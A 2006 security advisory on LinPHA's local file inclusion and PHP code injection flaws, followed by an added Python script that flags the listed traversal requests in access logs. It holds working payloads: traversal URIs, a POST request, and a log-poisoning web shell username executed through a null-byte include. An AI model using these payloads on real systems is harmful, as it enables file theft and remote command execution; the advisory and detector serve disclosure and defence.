LinPHA Multiple Local File Inclusion and PHP Code Injection Vulnerabilities
| Title |
LinPHA Multiple Local File Inclusion and PHP Code Injection Vulnerabilities |
| Published |
2006-02-11-12:00AM |
| Updated |
2006-02-11-12:00AM |
| Class |
Input Validation Error |
| CVE |
|
| Remote |
Yes |
| Local |
No |
| Credit |
Discovery is credited to rgod. |
| Vulnerable |
LinPHA LinPHA 0.9.4
LinPHA LinPHA 0.9.3
LinPHA LinPHA 0.9.2
LinPHA LinPHA 0.9.1
LinPHA LinPHA 0.9.0
LinPHA LinPHA 1.0 |
| Not Vulnerable |
|
| Code |
The following URI examples were provided for the file inclusion issues:
http://www.example.com/[host]/docs/index.php?lang=/../../../../../../../../../../test
http://www.example.com/[path]/install/install.php?language=/../../../../../../../test
http://www.example.com/[path]/install/sec_stage_install.php?whatlang=1&language=/../../../../../../../test
http://[target]/[path]/install/sec_stage_install.php?language=/../../../../../../../test
The following HTTP POST example was provided for the file inclusion issues:
POST [path]install/forth_stage_install.php HTTP/1.1
Host: [somehost]
Content-Type: application/x-www-form-urlencoded
Content-Length: [data_length]
User-Agent: GameBoy, Powered by Nintendo
Connection: Close

language=/../../../../../../../../test
The file inclusion issues may allow other system files to be retrieved if the 'magic_quotes_gpc' PHP directive is set to off.

The following steps were provided to exploit the PHP code injection issues:

1. Log in with username: <?php system($_GET[cmd]);?> and password: [whatever]

If 'magic_quotes_gpc' is set to off, it is possible to launch operating system commands through the following request:
http://www.example.com/[path]/docs/index.php?cmd=ls%20-la&lang=/../../sql/tmp/linpha.log%00
|
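The GET patterns listed above (a 'lang' or 'language' parameter carrying '../' sequences, optionally ending in %00) can be matched in web server access logs. The following Python scan is an added example, not part of the original advisory or of LinPHA; the log lines, the /linpha/ install path and the value English are constructed for illustration, and it goes slightly beyond the listed URIs by also catching percent-encoded and double-encoded traversal.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Parameters the advisory names as reaching an include path.
LANG_PARAMS = {"lang", "language"}
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def check_value(value):
    """Return the reasons a language value looks like an inclusion attempt."""
    # Decode repeatedly so double-encoded input (%252e%252e) is caught too.
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    reasons = []
    if ".." in value.replace("\\", "/").split("/"):
        reasons.append("traversal")
    if "\x00" in value:
        reasons.append("null-byte")
    return reasons

def scan(log_lines):
    """Return (line_number, path, param, reasons) for each suspicious request."""
    findings = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name.lower() in LANG_PARAMS:
                reasons = check_value(value)
                if reasons:
                    findings.append((n, url.path, name, reasons))
    return findings

# Constructed access-log lines (combined log format); addresses are documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Feb/2006:10:00:01 +0000] "GET /linpha/docs/index.php?lang=English HTTP/1.1" 200 5120',
    '192.0.2.44 - - [11/Feb/2006:10:02:13 +0000] "GET /linpha/docs/index.php?lang=/../../../../test HTTP/1.1" 200 312',
    '192.0.2.44 - - [11/Feb/2006:10:02:40 +0000] "GET /linpha/install/install.php?language=%2F..%2F..%2Ftest HTTP/1.1" 200 298',
    '192.0.2.44 - - [11/Feb/2006:10:03:05 +0000] "GET /linpha/docs/index.php?cmd=ls%20-la&lang=/../../sql/tmp/linpha.log%00 HTTP/1.1" 200 901',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The POST variant against forth_stage_install.php carries 'language' in the request body, which standard access logs do not record, so it needs request-body logging or a filtering rule in front of the application rather than this scan.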